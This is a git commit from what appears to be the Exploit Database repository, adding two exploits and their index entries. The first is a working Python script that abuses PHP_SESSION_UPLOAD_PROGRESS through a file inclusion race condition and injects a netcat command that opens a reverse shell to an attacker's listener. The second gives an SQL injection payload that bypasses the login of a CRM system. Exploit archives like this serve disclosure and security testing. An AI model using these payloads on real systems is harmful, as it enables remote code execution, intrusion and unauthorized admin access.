DB: 2021-07-28

2 changes to exploits/shellcodes

PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass
This commit is contained in:
Offensive Security 2021-07-28 05:01:54 +00:00
parent 90ccc5e194
commit f648cfe793
3 changed files with 87 additions and 0 deletions

66
exploits/php/webapps/50156.py Executable file
View file

@ -0,0 +1,66 @@
# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
# Date: 26/7/2021
# Exploit Author: SiLvER | Faisal Alhadlaq
# Tested on: PHP Version is 7.3.15-3
# This poc will abusing PHP_SESSION_UPLOAD_PROGRESS then will trigger race condition to get remote code execution, the script will return a reverse shell using netcat
#!/usr/bin/python3
"""
Usage :
python3 poc.p <Target URL> <ListnerIP> <ListnerPORT>
python3 poc.py https://xyz.xyz 192.168.1.15 1337
"""
import requests
import threading
import datetime
import sys
x = datetime.datetime.now()
addSeconds = datetime.timedelta(0, 10)
newDatetime = x + addSeconds
def fuzz():
targetIP = sys.argv[1]
listnerIP = sys.argv[2]
listnerPORT = sys.argv[3]
global newDatetime
while True:
try:
if datetime.datetime.now() > newDatetime:
exit()
# proxies = {
# "http": "http://127.0.0.1:8080",
# "https": "https://127.0.0.1:8080",
# }
sessionName = "SiLvER"
url = targetIP
s = requests.Session()
cookies = {'PHPSESSID': sessionName}
files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc '+ listnerIP +' '+ listnerPORT + ' -e /bin/bash`;?>'), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')}
# You need to change the parameter in your case , here the vulnerabile parameter is (lfi)
params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),)
x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies
except Exception as error:
print(error)
exit()
def main():
print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n")
threads = []
for _ in range(20):
t = threading.Thread(target=fuzz)
t.start()
threads.append(t)
for thread in threads:
thread.join
if __name__ == "__main__":
if len(sys.argv) < 4:
print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0]))
print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))
print("\n(=) By SiLvER \n")
exit()
else:
main()

View file

@ -0,0 +1,19 @@
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass
# Date: 27/07/2021
# Exploit Author: Shafique_Wasta
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip
# Version: 1
# Tested on: Windows 10/xampp
# DESCRIPTION #
# Customer relationship management system is vulnerable to Sql Injection Auth Bypass
# Exploit Working:
# 1. Visit on localhostcrm/customer/login.php
# 2. You will see the login panel
# 3. use this payload ( '=' 'or' ) in username and click on signin you will login into the admin account.
# Vulnerable URL :http://localhost/crm/customer/login.php
# Payload: '=' 'or'

View file

@ -44289,3 +44289,5 @@ id,file,description,date,author,type,platform,port
50151,exploits/aspx/webapps/50151.py,"Microsoft SharePoint Server 2019 - Remote Code Execution (2)",2021-07-23,Podalirius,webapps,aspx,
50154,exploits/windows/webapps/50154.py,"NoteBurner 2.35 - Denial Of Service (DoS) (PoC)",2021-07-26,stresser,webapps,windows,
50155,exploits/php/webapps/50155.txt,"XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)",2021-07-26,faisalfs10x,webapps,php,
50156,exploits/php/webapps/50156.py,"PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection",2021-07-27,"Faisal Alhadlaq",webapps,php,
50158,exploits/php/webapps/50158.txt,"Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass",2021-07-27,Shafique_Wasta,webapps,php,

Can't render this file because it is too large.